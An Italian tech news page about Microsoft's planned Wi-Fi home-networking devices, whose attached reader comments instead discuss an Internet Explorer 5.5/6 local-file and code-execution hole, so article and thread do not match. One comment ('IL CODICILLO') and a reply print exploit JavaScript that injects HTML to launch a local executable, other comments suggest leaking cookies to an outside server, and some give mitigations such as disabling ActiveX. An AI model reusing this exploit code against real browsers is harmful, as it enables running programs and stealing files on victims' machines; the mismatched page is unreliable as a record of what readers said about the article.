Microsoft lancerà i suoi device Wi-Fi

Dopo averne introdotto il supporto nativo in Windows XP e averne fatto la tecnologia prescelta per Mira, Microsoft si prepara ora a lanciare una linea di dispositivi Wi-Fi per l'home networking. Balzo in avanti


Redmond (USA) – Al pari di quanto hanno già fatto in tempi più o meno recenti molti produttori di periferiche e dispositivi di networking, a partire dal prossimo autunno Microsoft ha fatto sapere di voler entrare nel fertile business dei dispositivi Wi-Fi (802.11b). Sebbene il big di Redmond sia stato parco di dettagli, alcuni portavoce americani hanno affermato che la produzione di questi device verrà demandata alla stessa divisione che oggi si occupa di sfornare tastiere e topolini con o senza coda.

Questa mossa, che verrà ufficialmente annunciata fra pochi mesi, spinge ulteriormente il gigante del software sul mercato dell’hardware, un settore che a parere di Microsoft manca ancora di prodotti per l’home networking wireless sufficientemente economici e facili da installare e configurare. Il gigante di Redmond si è quindi offerto di metterci una pezza e tentare, attraverso l’hardware, di spingere nuovi software e servizi pensati per la casa digitale.

A qualcuno tutto ciò ricorda però da vicino quello che successe diversi anni fa sul mercato dei modem: Microsoft s’inventò lo standard “winmodem” che, se da un lato ebbe effettivamente il pregio di tagliare i costi di queste periferiche, dall’altro portava con sé la cronica incompatibilità con tutto ciò che non si chiamasse Windows.

Microsoft sostiene che la sua scelta è caduta sullo standard wireless 802.11b per il fatto che è largamente diffuso, sia in ambito aziendale che pubblico, e già supportato nativamente da Windows XP. Il colosso di Redmond ha però svelato di voler testare anche altre tecnologie più recenti e veloci: non è difficile immaginare che fra questi vi siano gli altri due standard della IEEE, 802.11a e l’imminente 802.11g .

Questa mossa rientra in quella più ampia strategia con cui Microsoft intende trasformare il PC in un media center, un centro di controllo per i dispositivi digitali a cui gli utenti potranno accedere attraverso connessioni wireless da ogni punto della casa o dell’ufficio. Fra le prime tecnologie a far parte di questa visione vi sono Mira e Freestyle : con la prima, in particolare, Microsoft intende dar vita ad un nuovo genere di dispositivi, chiamati “smart display”, che consentano agli utenti di portarsi “il monitor a spasso” accedendo a Windows XP attraverso il protocollo Remote Desktop e connessioni wireless in standard Wi-Fi.

Sempre in tema di tecnologie wireless, ma in questo caso slegate dall’ambito home networking, Microsoft ha recentemente presentato in anteprima una linea di tastiere e mouse senza fili basate sulla tecnologia Bluetooth.

La tua email sarà utilizzata per comunicarti se qualcuno risponde al tuo commento e non sarà pubblicato. Dichiari di avere preso visione e di accettare quanto previsto dalla informativa privacy

  • Anonimo scrive:
    Non vorrei sbagliare
    Non mi vorrei sbagliare ma analizzando il codice sul sito pivx, mi pare che questo baco fosse stato segnalato su bugtraq almeno 4 mesi fa!
  • Anonimo scrive:
    Microsoft o Megabug ecco il nuovo nome
    microsoft non può pensare di macinare gigabyte di codice senza adeguate prove e test, mi immagino posti dove la sicurezza deve essere totale, banche, presidi militari, ...........
  • Anonimo scrive:
    VERGOGNA !!!
    BASTA !!!OGNI GIORNO UN NUOVO BACO !!MA CHE GENTE LAVORA ALLA MICROSOFT ???BILL GATES, CON TUTTI I TRILIARDI CHEHA GUADAGNATO, E' ORA CHE ASSUMA GENTESERIA E LA FINISCA DI VENDERCI CODICECHE NON VALE UN @@@@@ !!!!!!!!!!!!!VERGOGNA !!!!!!
  • Anonimo scrive:
    SOLO BUG PUO COSTRUIRE
    LA ms E' SPECIALIZZATA NEL COSTRUIRE BUGE QUESTA LA SU OCCUPAZIONE PRINCIPALE ANCHE PERCHE LA MASSA VUOLE I PROGRAMMI BAGATE E NON INTERESSANO LE COSE FATTE BENE.MARFILLINUX GENERATION
  • Anonimo scrive:
    Bravi caXXoni
    Che se ne fanno di una patch? La maggior parte di quelli che ho letto in questo forum hanno bisogno di una patch al cervello e per loro un grave bug sul PC o sulla PS2 non fa differenza.In effetti la gravità di questo buco è enorme e tutti dovrebbero mettersi al riparo come suggerito dall'autore dell'exploit.Funziona e bene su qualunque browser 5.5 e 6 (non ne ho altri) e se foste in grado di inserire i path giusti per il vostro SO forse ve ne accorgereste anche voi.Questo buco NON è come leggere da locale i files del vostro HD e mostrarli in una pagina HTML. Anche se la gente che ha abboccato a quello stupido javascript dirà: "Ah! Ah! Stavolta non ci casco."E quelli con i browser vecchi poi?!!!Non siate ridicoli, IE4 codename Emmenthal NON è sicuro!
    • Anonimo scrive:
      Re: Bravi caXXoni


      Funziona e bene su qualunque browser 5.5 e 6
      (non ne ho altri) e se foste in grado di
      inserire i path giusti per il vostro SO
      forse ve ne accorgereste anche voi.

      Questo buco NON è come leggere da locale i
      files del vostro HD e mostrarli in una
      pagina HTML. Anche se la gente che ha
      abboccato a quello stupido javascript dirà:
      "Ah! Ah! Stavolta non ci casco."

      E quelli con i browser vecchi poi?!!!
      Non siate ridicoli, IE4 codename Emmenthal
      NON è sicuro!Confermo che NON si tratta di una bufala.IE5 è immune dal problema.Per proteggere IE5.5 e IE6 è sufficiente alzare il livello di sicurezza abilitando solo ed unicamente l'impostazione ActiveX relativa ai plugin (la prima della lista,per poter vedere le Flash).CiaoGrilloParlante
      • Anonimo scrive:
        Re: Bravi caXXoni
        .... andate all'opera!Bravi bravi... buttate via win piuttosto e smetterete di dover frignare... mo venitemi a parlare del buco dell'ssh... fa molto agli utenti domestici, invece il sistema principe delle utenze domestiche...andate piuttosto a scrivere virus per mozilla windowsiani va vediamo che sapete fare...
  • Anonimo scrive:
    windows98 + explorer 4, l'exploit non funziona.
    Cosi' imparate a scaricare nuove versioni anche quando non servono: ho l'explorer 4, quello di windows 98 prima versione (a cui ho applicato solo 3 o 4 patches durante gli anni) e ogni volta che esce un bug nuovo il mio sistema risulta immune, sono tutte falle introdotte nelle nuove versioni come la 5.5 o la 6, usate una versione vecchie e potrete navigare tranquilli.
    • Anonimo scrive:
      Re: windows98 + explorer 4, l'exploit non funziona
      :-)))) allora io uso la redhat 5.0!anzi, il digital research dos!- Scritto da: MadDog

      Cosi' imparate a scaricare nuove versioni
      anche quando non servono: ho l'explorer 4,
      quello di windows 98 prima versione (a cui
      ho applicato solo 3 o 4 patches durante gli
      anni) e ogni volta che esce un bug nuovo il
      mio sistema risulta immune, sono tutte falle
      introdotte nelle nuove versioni come la 5.5
      o la 6, usate una versione vecchie e potrete
      navigare tranquilli.
  • Anonimo scrive:
    Tutto falso!
    Ma dico, non crederete mica che l'inventore di Internet, tale guglielmo cancelli, produca software con tali buchi?No, lui è un genio! Anche se nel '95 ha detto "internet non vale niente", anche se nel '83 ha detto "640kb saranno sufficienti per qualsiasi applicazione", anche se molte volte ti spiega che "il programma ha causata un'operazione non valida", ma non per colpa di windows, sia ben inteso, ma per colpa del programma stesso!E' un genio insomma! No, io non ci credo che IE si bacato! E poi dai, siamo realistici... la mia Debian non l'ho pagata una lira e dal '98 (data in cui l'ho installata) non ha dato un problema che sia uno, ne deduco che un OS che si paga debba essere molto meglio!Va beh, ad ogni modo tra due anni esce Palladium e mette fine a tutti i problemi... anzi, metterà proprio fine a tutto, nel senso che potete mettere un bel cartello "the end" sul vostro computer perchè l'informatica come è stata conosciuta fino ad oggi scomparirà.Purtroppo ancora la cosa non mi toccherà più di tanto, visto che Palladium è un progetto che girerà sulla piattaforma Intel e, sempre purtroppo, da un anno il mio vecchio PC Intel è affiancato da un nuovo powerpc (anche questo con Debian... ma non perché voglia usare Debian, ma perché Bill non ha fatto nessuna versione di Windows per powerpc... che sfiga, neh!).Adios!
    • Anonimo scrive:
      Re: Tutto falso!

      Ma dico, non crederete mica che l'inventore
      di Internet, tale guglielmo cancelli,Vabbe' dai manco lui dice questo
      • Anonimo scrive:
        Re: Tutto falso!
        - Scritto da: manxo

        Ma dico, non crederete mica che
        l'inventore

        di Internet, tale guglielmo cancelli,

        Vabbe' dai manco lui dice questoNon ancora....
  • Anonimo scrive:
    IL CODICILLO
    var ref = document.getElementById("dataObject").object;function ExecuteFile(){ ref.location.href = "file://c:/fdbfd" + (new Date()).getTime(); setTimeout("CheckFile()",1000);}function CheckFile(){ var sHTML = HtmlInput.value.replace(/$WHATFILE$/, "c:/winxp/system32/calc.exe" ); ref.body.insertAdjacentHTML( "beforeEnd" , sHTML );}ExecuteFile()
    • Anonimo scrive:
      Re: IL CODICILLO
      Bene! Finalmente si parla di tecnologia! Il codice e' questo. Adesso trasformalo in una pagina .html in grado di fare quello che dice l'articolo, cosi' possiamo fare una prova seria... (...)- Scritto da: organ



      data="empty.html"
      style="width:1px;left:-10000px"




      var ref =
      document.getElementById("dataObject").object;

      function ExecuteFile(){
      ref.location.href = "file://c:/fdbfd" +
      (new Date()).getTime();
      setTimeout("CheckFile()",1000);
      }

      function CheckFile(){
      var sHTML =
      HtmlInput.value.replace(/$WHATFILE$/,
      "c:/winxp/system32/calc.exe" );
      ref.body.insertAdjacentHTML( "beforeEnd" ,
      sHTML );
      }

      ExecuteFile()


      name="textarea"

      classid="clsid:11111111-1111-1111-1111-111111
    • Anonimo scrive:
      Re: IL CODICILLO
      Lascia perdere organ, tanto a questi gli manca l'organo fondamentale cioè il cervello:)La prova seria gliela farà fare qualche smanettone da quattro soldi quando metterà a disposizione sul suo sito web una foto di Pamela Anderson nuda con il link INGRANDISCI e lo script incriminato.
      • Anonimo scrive:
        Re: IL CODICILLO
        - Scritto da: Adesso Basta
        Lascia perdere organ, tanto a questi gli
        manca l'organo fondamentale cioè il
        cervello:)

        La prova seria gliela farà fare qualche
        smanettone da quattro soldi quando metterà a
        disposizione sul suo sito web una foto di
        Pamela Anderson nuda con il link INGRANDISCI
        e lo script incriminato.Da quanto sopra si evince che:Adesso Basta chiama "smanettoni da quattro soldi" gli hackers, eroi della rivoluzione informatica.Adesso Basta non ama la fi*a.(hehe)
        • Anonimo scrive:
          Re: IL CODICILLO
          Questo codice gira in irq già da 7-8 giorni....Comunque è bene ke anche i lamers abbiano a disposizione l codice già bello e pronto....spierpa89
  • Anonimo scrive:
    Usate Linux
    Usate Linux
  • Anonimo scrive:
    il grande fratello?
    ms è una merdaccia lo fa apposta per introdurre palladium e diventare il grande fratello per antonomasia
  • Anonimo scrive:
    MICROSOFT NON VALE NIENTE
    MICROSOFT NON VALE NIENTE
    • Anonimo scrive:
      Re: MICROSOFT NON VALE NIENTE
      - Scritto da: MICROSOFT NON VALE NIENTE
      MICROSOFT NON VALE NIENTEma l'hai capito solo ora? :(
    • Anonimo scrive:
      Re: MICROSOFT NON VALE NIENTE
      - Scritto da: MICROSOFT NON VALE NIENTE
      MICROSOFT NON VALE NIENTESei tu che non vali niente! Prova a realizzare un sistema "CHE NON VALE NIENTE" come Windows in tutte le sue versioni e poi ne riparleremo, capito? Non ti azzardare a parlare in questo modo.
      • Anonimo scrive:
        Re: MICROSOFT NON VALE NIENTE
        - Scritto da: Marco1111


        - Scritto da: MICROSOFT NON VALE NIENTE

        MICROSOFT NON VALE NIENTE

        Sei tu che non vali niente! Prova a
        realizzare un sistema "CHE NON VALE NIENTE"
        come Windows in tutte le sue versioni e poi
        ne riparleremo, capito? Non ti azzardare a
        parlare in questo modo.Esatto, prova a realizzare un OS come windows e poi ne riparleremo...quindi...ci vediamo tra un'oretta? ^_^
    • Anonimo scrive:
      Re: MICROSOFT NON VALE NIENTE
      - Scritto da: MICROSOFT NON VALE NIENTE
      MICROSOFT NON VALE NIENTETroll detected.
  • Anonimo scrive:
    Un browser dovrebbe fare solo il browser
    Se i browser (e i client di posta) non fossero stati dotati della possibilita' di eseguire codice senza il controllo dell'utente il 99% delle falle non avrebbe ragione di esistere.Al di la' del fatto che questa falla venga chiusa o no, il sistema e' comunque intrinsecamente insicuro.La comodita' di poter eseguire codice nel browser si paga (purtroppo) a caro prezzo.SalutiGiorgio
  • Anonimo scrive:
    Ultra bug ?
    Basta disattivare Aktiv-X e/o java e il "superbug" é neutralizzato .byeClame
  • Anonimo scrive:
    Sempre i soliti
    ignotonti :-D ROTFL
  • Anonimo scrive:
    Soluzione immediata x tutti i browser IE.
    Ciao,confermo che anche su Win IE5 l'exploit funziona perfettamente (sigh).Per chi non avesse ancora letto fra i thread come sistemare le cose confermo che è sufficiente disabilitare gli ActiveX ed IE non è più violabile.La disattivazione degli ActiveX personalmente l'avevo fatta già da molto tempo senza sentirne affatto la mancanza.... ;)Questa è la soluzione definitiva credo per chi usa IE4 e IE5, per IE5.5 probabilmente uscirà una patch.Ciao a tutti.Tamerlano
    • Anonimo scrive:
      Re: Soluzione immediata x tutti i browser IE.
      - Scritto da: Tamerlano

      Ciao,
      confermo che anche su Win IE5 l'exploit
      funziona perfettamente (sigh).Ciao,devo fare una precisazione, su IE5 l'exploit funziona esclusivamente in locale a prescindere dalle impostazioni di sicurezza.Cioè in locale è sempre possibile lanciare arbitrariamente eseguibili o catturare il contenuto di files anche se activex è disabilitato.In locale dunque non rappresenta un security hazard anzi diventa una funzionalità integrativa per applicazioni offline controllate dall'utente.Online invece IE5 è immune dal problema anche con ActiveX attivato (protezione media) consentendo al massimo di visualizzare file locali in un frame ma non di acquisirne il contenuto. Pare dunque che il problema riguardi specificamente IE5.5 e IE6 (che non ho provato)Ciao!Tamerlano
  • Anonimo scrive:
    Ma che mi frega...
    Chi se ne frega cazzo... capite na sega eh? Vorrei sapere cosa ve ne importa se c'è un bug di questo tipo, avete amici così bastardi? Ma dai che non vivete nei film, allora andate in giro con un giubbotto anti proiettili visto che un "potenziale aggressore" può spararvi e la pelle non è abbastanza corazzata... certo a meno che abbiate la nuova Skinrake 9.7 che nessuno l'affonda.Tutti paranoici fanatici di wargames & co. Oppure tutti agenti della cia con decine di hackers alle spalle. Fate voi.
    • Anonimo scrive:
      Re: Ma che mi frega...
      Perche' non lasci aperta la macchina? Oppure la porta di casa?
    • Anonimo scrive:
      ne conosci di gente
      - Scritto da: afdga
      Chi se ne frega cazzo... capite na sega eh?
      Vorrei sapere cosa ve ne importa se c'è un
      bug di questo tipo, avete amici così
      bastardi? scusa ma tu.... giri solo su siti di tuoi amici? navighi unicamente pagine di cui conosci l'autore e magari anche il server administrator?però.. complimenti o conosci un pacco di gente, o non navighi affatto...
    • Anonimo scrive:
      Re: Ma che mi frega...
      - Scritto da: afdga
      Chi se ne frega cazzo... capite na sega eh?
      Vorrei sapere cosa ve ne importa se c'è un
      bug di questo tipo, avete amici così
      bastardi? Ma dai che non vivete nei film,
      allora andate in giro con un giubbotto anti
      proiettili visto che un "potenziale
      aggressore" può spararvi e la pelle non è
      abbastanza corazzata... certo a meno che
      abbiate la nuova Skinrake 9.7 che nessuno
      l'affonda.Sei fatto amico, sei fatto come un coppertone! :)E sei anche triviale :)

      Tutti paranoici fanatici di wargames & co.
      Oppure tutti agenti della cia con decine di
      hackers alle spalle. Fate voi.Si può apprezzare wargames (grande film) senza essere paranoici o agenti della cia. Se per te guardare un film sul mondo dei computer vuol dire essere paranoici, guardati solo Bambi! anzi, neanche quello, è troppo triste quando sparano alla mamma cerbiatta!
    • Anonimo scrive:
      Re: Ma che mi frega...
      - Scritto da: afdga
      Chi se ne frega cazzo... capite na sega eh?
      Vorrei sapere cosa ve ne importa se c'è un
      bug di questo tipo, avete amici così....Ecco da dove arriva il termine "utonti"....
      • Anonimo scrive:
        Re: Ma che mi frega...
        - Scritto da: TeX


        - Scritto da: afdga

        Chi se ne frega cazzo... capite na sega
        eh?

        Vorrei sapere cosa ve ne importa se c'è un

        bug di questo tipo, avete amici così
        ....

        Ecco da dove arriva il termine "utonti"....E` la naturale conseguenza di sovraesposizionealla cultura Microsoft.
  • Anonimo scrive:
    E la microsoft se ne frega...
    Questo tizio gli ha segnalato la notizia il 25 di giugno. Oggi e' il 12 di luglio e ancora la patch non l'hanno fatta.Due considerazioni:1. Avete voglia a dire che e' meglio non pubblicare l'exploit. Finche' la microsoft non vede il fuoco non muove il culo.2. E a microsoft affidereste incondizionatamente i vostri dati?Buona fortuna.
  • Anonimo scrive:
    Altri Browser
    Qualcuno ha testato se "l'exploit" funziona anche su altri browser diversi da IE??
    • Anonimo scrive:
      Re: Altri Browser
      - Scritto da: DeM0
      Qualcuno ha testato se "l'exploit" funziona
      anche su altri browser diversi da IE??non credo... il problema credo che discenda dalle follie di "integrazione" di IE.Gli altri browser non hanno i permessi di gironzolare a piacere sull'HD.e comunque nè Mozilla nè Opera sono vulnerabili
    • Anonimo scrive:
      Re: Altri Browser
      secondo me sulle macchine su cui funziona con IE funziona anche con NeoPlanet :-P
      • Anonimo scrive:
        Re: Altri Browser
        - Scritto da: cippa
        secondo me sulle macchine su cui funziona
        con IE funziona anche con NeoPlanet :-Peggrazie!neoplanet è solo il vestito di IE per andare a messavoglio dire, neoplanet NON è un altro browser, è solo un'interfaccia diversa di IE
    • Anonimo scrive:
      Re: Altri Browser
      - Scritto da: DeM0
      Qualcuno ha testato se "l'exploit" funziona
      anche su altri browser diversi da IE??Opera fino alla 6.02/w32 ha un baco identico.
    • Anonimo scrive:
      Re: Altri Browser
      - Scritto da: DeM0
      Qualcuno ha testato se "l'exploit" funziona
      anche su altri browser diversi da IE??Beh, difficile che su prodotti diversi ci sia lo stesso baco... Il che non vuol dire che i bachi non ci siano in tutti i prodotti... Proprio recentemente ne è stato scoperto (e chiuso) uno per certi versi simile in Mozilla...Comunque quando ho provato l'exploit, inavvertitamente la prima volta l'ho fatto con Mozilla... e ovviamente non ha funzionato.
  • Anonimo scrive:
    [OT] Suggerimento x la redazione
    Carissimi, si potrebbe aggiungere nei link di navigazione ai piè del forum anche l'opzione "Indice Opinioni con Thread Espansi" (o similia , beninteso) ?Infatti , specialmente quando i contributi iniziano a essere in un certo numero , la visione a thread fa più comodo di quella semplice e tuttavia è scomodo ogni volta fare due click per arrivare alla visualizzazione estesa.Grazie.
  • Anonimo scrive:
    Che ne pensate di NETSCAPE 6.2?!?
    ...io personamente ho sempre preferito utilizzare Netscape, ancora dalla versione 1.0, poi dalla 3.01 lo affiancavo a M$.Ora sto utilizzando la versione 6.2 e devo dire che funziona proprio bene e che permette di avere un buon controllo su cookies, javascript e java vari!!!P.S.: ora di nuovo non uso più Explorer! :)))
    • Anonimo scrive:
      Re: Che ne pensate di NETSCAPE 6.2?!?
      - Scritto da: UfKDopo aver visto la 6.0 mi son detto "meglio aspettare Mozilla"Dopo aver visto MOzilla, mi son detto "bello, lo tengoinstallato, ma gli preferisco Opera"
      • Anonimo scrive:
        Re: Che ne pensate di NETSCAPE 6.2?!?
        - Scritto da: SiN
        Dopo aver visto la 6.0 mi son detto "meglio
        aspettare Mozilla"

        Dopo aver visto MOzilla, mi son detto
        "bello, lo tengoinstallato, ma gli
        preferisco Opera" In effetti la 6.0 non aveva convinto neanche me, ma la 6.2 mi sembra proprio più che matura...Potrebbe essere la loro occasione per riprendersi il maltolto! :)
        • Anonimo scrive:
          Re: Che ne pensate di NETSCAPE 6.2?!?
          hai provato la PR1 della 7.0? non ho visto la 6.2 ma rispetto alla 6.0 ci sono diverse aggiunte nelle opzioni... pero' dal punto di vista dell'interfaccia e' praticamente identico, ed e' l'interfaccia la cosa che proprio non mi piace di netscape :/
          • Anonimo scrive:
            Re: Che ne pensate di NETSCAPE 6.2?!?
            - Scritto da: cippa
            hai provato la PR1 della 7.0? non ho visto
            la 6.2 ma rispetto alla 6.0 ci sono diverse
            aggiunte nelle opzioni... pero' dal punto di
            vista dell'interfaccia e' praticamente
            identico, ed e' l'interfaccia la cosa che
            proprio non mi piace di netscape :/Credo che la scaricherò in settimana!Se ti riferisci allo skin penso tu già sappia che puoi modificarlo....vero?
          • Anonimo scrive:
            Re: Che ne pensate di NETSCAPE 6.2?!?
            no, non la skin, proprio il modo con cui e' costruita l'interfaccia... come son fatti i controlli... :) tra l'altro ora non ci faccio piu' caso perche' la RAM non e' piu' un problema, ma se explorer occupa gia' una discreta quantita' di memoria (sui 10-15 mega), hai notato che netscape arriva quasi sui 40?almeno rispetto alla 6 e' un razzo all'apertura... ;-)
          • Anonimo scrive:
            Re: Che ne pensate di NETSCAPE 6.2?!?
            ma perché parlate di netscape????scusate la mia beata ignoranza.ma netscape non è mozilla rimarchiato? e di solito le release di netscape sono anche con meno feature e basate su release non aggiornatissime di mozilla.meglio mozilla no?
          • Anonimo scrive:
            Re: Che ne pensate di NETSCAPE 6.2?!?
            credo che sia la domanda + comune al riguardo =D leggi la FAQ di M/N, chiarisce bene la cosa... in particolare http://www.gerbilbox.com/newzilla/general/general02.php
    • Anonimo scrive:
      Re: Che ne pensate di NETSCAPE 6.2?!?
      - Scritto da: UfK
      ...io personamente ho sempre preferito
      utilizzare Netscape, ancora dalla versione
      1.0, poi dalla 3.01 lo affiancavo a M$.
      Ora sto utilizzando la versione 6.2 e devo
      dire che funziona proprio bene e che
      permette di avere un buon controllo su
      cookies, javascript e java vari!!!

      P.S.: ora di nuovo non uso più Explorer!
      :)))Ho sempre odiato Netscape. Ho installato la 6.0 e l' ho disinstallata quasi immediatamente. Continuo con l' Explorer, meglio ;-))
  • Anonimo scrive:
    Vi vedo tutti i file di c:
    http://www.pseirc.net/test.htmAprite questa pagina e vi vedo tutti i file di c::))Ma non lo capite che i cookie o i file si aprono solo in locale????Mica li passate al server o cose del genere....Nessuno ve li vede
    • Anonimo scrive:
      Re: Vi vedo tutti i file di c:
      - Scritto da: DeM0
      http://www.pseirc.net/test.htm

      Aprite questa pagina e vi vedo tutti i file
      di c:

      :))

      Ma non lo capite che i cookie o i file si
      aprono solo in locale????

      Mica li passate al server o cose del
      genere....
      Nessuno ve li vedeIl sito che hai indicato è una bufala evidente.L'exploit di cui parla l'articolo è reale ed utilizzabile.Ce n'era uno equivalente un anno fa, e l'ho sperimentato personalmente sul web server che gestisco.
    • Anonimo scrive:
      Re: Vi vedo tutti i file di c:
      ci metti un attimo a pssarli via querystring ad un server che vuoi ... di norma un dominio diverso da quello del cookie NON DEVE VEDERE ASSOLUTAMENTE il contenuto di un cookie non suo. Non sò se riesci ad ottenere una collaborazione di neuroni tale da comprendere il messagio Scherzo via :P
      • Anonimo scrive:
        Re: Vi vedo tutti i file di c:
        senza l'autorizzazione dell'utente?- Scritto da: michele
        ci metti un attimo a pssarli via querystring
        ad un server che vuoi ... di norma un
        dominio diverso da quello del cookie NON
        DEVE VEDERE ASSOLUTAMENTE il contenuto di un
        cookie non suo. Non sò se riesci ad ottenere
        una collaborazione di neuroni tale da
        comprendere il messagio

        Scherzo via :P
        • Anonimo scrive:
          Re: Vi vedo tutti i file di c:
          siete davvero sicuri che legge i cookie????all'inizio non avevo cookie di yahoo ma sul sito dello dello scopritore del bug mi dava il cookie bello scritto...ok dico adesso mi collego al sito di yahoo cosi avrò un loro cookie, mi collego e nalla cartella dei cookie mi compare il cookie di yahoo con dentro:B13iig6kuitork&b=2&f=syahoo.com/102498540748830072022409254377629501869*ok adesso ritorno su l'exploit e riprovo pensando di ritrovare lo stesso codice che ho incollato sopra.. inveceB=13iig6kuitork&b=2&f=s; LYC=l_v=0&l_lv=2&l_s=y3r1yyx4wx44u5zr1sz4t55wwyturuzzcancello il cookie di yahoo e mi dà ancora B=13iig6kuitork&b=2&f=s; LYC=l_v=0&l_lv=2&l_s=y3r1yyx4wx44u5zr1sz4t55wwyturuzz mha!!!! a voi le conclusioniper me l'exploit è na sola!!
  • Anonimo scrive:
    per rendere sicura un'informazione...
    bisogna renderla di pubblico dominio.Bravo il nostro ricercatore, continua così.
    • Anonimo scrive:
      Re: per rendere sicura un'informazione...
      - Scritto da: io
      bisogna renderla di pubblico dominio.
      Bravo il nostro ricercatore, continua così.I buchi vanno resi noti A TUTTI.Gli exploit per sfruttarli no. Questi ultimi vanno segnalati SOLO AL PRODUTTORE.Molto semplice.Cosa ne pensi?
  • Anonimo scrive:
    E questa gente vorrebbe fare Palladium ?
    Per garantire la sicurezza agli utenti !ROTFL !
    • Anonimo scrive:
      Re: E questa gente vorrebbe fare Palladium ?
      Sicuramente un professore come te saprebbe fare molto di meglio ;)
      • Anonimo scrive:
        Re: E questa gente vorrebbe fare Palladium ?
        devi ammettere pero' che e' difficile fare peggio della M$ in materia di sicurezza ;secondo me la microsoft e' piu' cracker-friendly che user-friendly
        • Anonimo scrive:
          Re: E questa gente vorrebbe fare Palladium ?
          - Scritto da: illegalinstruction
          devi ammettere pero' che e' difficile fare
          peggio della M$ in materia di sicurezza ;
          secondo me la microsoft e' piu'
          cracker-friendly che user-friendly
          Che uomo... se il 90% della gente usasse fintux troveresti altrettanti bug su fintux, open SSH e apache sono dell'altro ieri.
          • Anonimo scrive:
            Re: E questa gente vorrebbe fare Palladium ?


            Che uomo... grazie lo so
            se il 90% della gente usasse
            fintux troveresti altrettanti bug su fintux,mi dai il link a questo nuovo s.o ? ;-)seriamente ,all' inizio linux (il kernel )era un giocattolo,oggi non piu'
            open SSH e apache sono dell'altro ieri.insisto : preferisco un server linux/BSD a un server M$ (almeno nel server linux/BSD so cosa funziona e cosa no )poi ognuno usa quello che gli pare ,ci mancherebbe( palladium non e' ancora una realta')
          • Anonimo scrive:
            Re: E questa gente vorrebbe fare Palladium ?
            - Scritto da: Ciao


            - Scritto da: illegalinstruction

            devi ammettere pero' che e' difficile
            fare

            peggio della M$ in materia di sicurezza ;

            secondo me la microsoft e' piu'

            cracker-friendly che user-friendly



            Che uomo... se il 90% della gente usasse
            fintux troveresti altrettanti bug su fintux,
            open SSH e apache sono dell'altro ieri.Eccolo qua il solito difensore delle cause perse(stipendiato dalla M$??)
  • Anonimo scrive:
    Dipende da quanto navighi
    Se navighi TANTO allora magari c'hai pure una possibilita' su un milione che qualcuno ti entri nel computer.Se navighi solo su SITI NOTI non corri alcun rischio.Inutile la patch.
    • Anonimo scrive:
      Re: Dipende da quanto navighi
      - Scritto da: Wendy
      Se navighi TANTO allora magari c'hai pure
      una possibilita' su un milione che qualcuno
      ti entri nel computer.
      Se navighi solo su SITI NOTI non corri alcun
      rischio.
      Inutile la patch.Giusto !Io per sicurezza lascerei anche il computer spento e anzi, scollegato anche dalla rete elettrica.Cosi' il computer e' al sicuro senza bisogno di alcuna patch.
    • Anonimo scrive:
      Re: Dipende da quanto navighi
      - Scritto da: Wendy
      Se navighi TANTO allora magari c'hai pure
      una possibilita' su un milione che qualcuno
      ti entri nel computer.
      Se navighi solo su SITI NOTI non corri alcun
      rischio.
      Inutile la patch.mah si hai perfettamente ragione, piantiamola di complicarci la vita con queste patch, ad-aware anti spyware, antivirus, tanto il rischio è piccolo, e poi al limite che succede? mi prendono due dati personali? sapranno quanti soldi ho in banca. O peggio, mi obbligano a riformattare e reinstallare win?tanto ci pensa già mamma M$ a farmi reinstallare win ogni 3 mesi, mica servono i trojan :-))))sai qual'è l'unico pc con WIN IE OUTLOOK sicuro?quello con la corrente staccata, i cavi del modem lontani 10 metri, chiuso in una stanza iperbarica, con allarmi collegati alle centrali.continua a vivere nel tuo mondo di M$ Ovatta
      • Anonimo scrive:
        Re: Dipende da quanto navighi
        secondo me ha ragione, il problema e' che dubito ci siano molti utenti che navigano solo in 'siti noti'... quando cominci a usare un motore di ricerca sei gia' a rischio...
        • Anonimo scrive:
          Re: Dipende da quanto navighi
          - Scritto da: cippa
          secondo me ha ragione, il problema e' che
          dubito ci siano molti utenti che navigano
          solo in 'siti noti'... quando cominci a
          usare un motore di ricerca sei gia' a
          rischio...Si bravo, il web senza motori di ricerca. Tu navighi solo su siti noti. Allora non hai capito a cosa serve internet
          • Anonimo scrive:
            Re: Dipende da quanto navighi
            santo cielo, non ti scaldare e letti un'altra volta, ho detto la stessa cosa che hai detto tu :)
          • Anonimo scrive:
            Re: Dipende da quanto navighi
            - Scritto da: cippa
            santo cielo, non ti scaldare e letti
            un'altra volta, ho detto la stessa cosa che
            hai detto tu :)ehehe tranquillo cippa, qui la gente legge al volo, capisce quello che vuole e poi insulta senza pensarci su due volte :-) che ci vuoi fare?
      • Anonimo scrive:
        Re: Dipende da quanto navighi
        Pensa di più e parla meno.Frozen
  • Anonimo scrive:
    IE al 90% su PI
    Un forum impestato di trolamenti vari.E poi si scopre che IE viene usato al 90%.Se è risposto che IE lo si usa x forza visto che il lavoro passa solo quello.Ma come? IE è tanto pericoloso e lo usate al lavoro mettendo a rischio l'azienda?Ma no! Sputare contro Microsoft vale senz'altro il rischio.
    • Anonimo scrive:
      Re: IE al 90% su PI
      - Scritto da: reminder

      Ma come? IE è tanto pericoloso e lo usate al
      lavoro mettendo a rischio l'azienda?Non sono io che amministro il server.Tempo fa avevo fatto presenta la cosa al tipo del ced, chiedendo se non si poteve mattere un proxy degno di questo nome, invece di uno che facesse passare solo MSIEIl tipo ci stava facen do delle prove, ma poi ha ricevuto un'offerta + interesante X lavorare altrove, e la cosa e' finita nel nulla, col nuovo tipo del ced.Va da sè che sul mio computer di case MSIE non p nememno installato.
      • Anonimo scrive:
        Re: IE al 90% su PI
        - Scritto da: SiN


        - Scritto da: reminder




        Ma come? IE è tanto pericoloso e lo usate
        al

        lavoro mettendo a rischio l'azienda?

        Non sono io che amministro il server.

        Tempo fa avevo fatto presenta la cosa al
        tipo del ced, chiedendo se non si poteve
        mattere un proxy degno di questo nome,
        invece di uno che facesse passare solo MSIE
        Il tipo ci stava facen do delle prove, ma
        poi ha ricevuto un'offerta + interesante X
        lavorare altrove, e la cosa e' finita nel
        nulla, col nuovo tipo del ced.

        Va da sè che sul mio computer di case MSIE
        non p nememno installato.io utilizzo ie al lavoro e a casa ed in anni di utilizzo girando nei siti piu distarati non ho mai avuto nessun tipo di problema.
        • Anonimo scrive:
          Re: IE al 90% su PI
          Personalmente nemmeno io ho mai avuto problemi con IE, visto anche che lo uso raramente, ma non mi fa piacere andare in rete con un browser che potenzialmente permette l'esecuzione di script senza avere la possibilita' di ocnfigurarlo adeguatamente, e non venitemi a dire che le opzioni sulla sicurezza di IE sono ben fatte !!!!
        • Anonimo scrive:
          Re: IE al 90% su PI
          - Scritto da: birillom
          io utilizzo ie al lavoro e a casa ed in anni
